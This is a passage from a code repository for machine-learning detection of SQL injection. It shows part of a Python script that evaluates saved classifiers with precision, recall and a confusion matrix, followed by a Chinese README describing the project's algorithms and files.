    merged = pd.concat(
        [pd.read_csv(sql_matrix, header=None), pd.read_csv(nor_matrix, header=None)],
        ignore_index=True,
    )
    merged.to_csv(allm_dir, encoding="utf_8_sig", index=False, header=False)
    return allm_dir


def test_data(allm_dir):
    """Load a headerless feature CSV and split it into features and labels.

    Args:
        allm_dir: Path of a feature CSV as returned by ``test_c``.

    Returns:
        Tuple ``(features, labels)``: every column except the last, and the
        label column (index 7).
    """
    # utf_8_sig reads files both with and without the BOM that test_c writes.
    feature_max = pd.read_csv(allm_dir, header=None, encoding="utf_8_sig")
    arr = feature_max.values
    features = np.delete(arr, -1, axis=1)  # drop the last (label) column
    labels = arr[:, 7]
    return features, labels
41 |
if __name__=="__main__":
    # Interactive loop: load a saved model, build the requested test matrix
    # and print the evaluation metrics.
    while True:
        model_name = input("请输入要选择的模型名称:")
        # NOTE(review): joblib.load unpickles the file, which can execute
        # arbitrary code; only load model files from a trusted source.
        clf = joblib.load('./file/'+model_name)
        print(model_name," has been loaded")
        flag = input("请输入测试文件个数:")
        sql_flag = input("请输入样本类型:")
        mode = test_c(flag, sql_flag)
        # Use distinct names for the results. Assigning to `test_data` here
        # would replace the test_data() function with an array and make the
        # next loop iteration fail with "object is not callable".
        features, labels = test_data(mode)
        y_pred = clf.predict(features)  # predict
        print("y_pred:%s" % y_pred)
        print("test_target:%s" % labels)
        # Verify
        print('Precision:%.3f' % metrics.precision_score(y_true=labels, y_pred=y_pred))  # precision
        print('Recall:%.3f' % metrics.recall_score(y_true=labels, y_pred=y_pred))  # recall
        print(metrics.confusion_matrix(y_true=labels, y_pred=y_pred))  # confusion matrix
58 |
59 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ML-for-SQL-Injection
2 | 机器学习检测SQL注入
3 |
4 | 本项目是使用机器学习算法来分类SQL注入语句与正常语句:
5 | 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。
6 | data是收集的样本数据
7 | file中存放的是训练好的各个模型
8 | featurepossess.py是对原始样本进行预处理,提特征。
9 | sqlsvm.py等py文件是训练模型
10 | testsql.py是对训练好的模型进行测试,用精确率(Precision)、召回率(Recall)和混淆矩阵来度量模型效果。
11 |
--------------------------------------------------------------------------------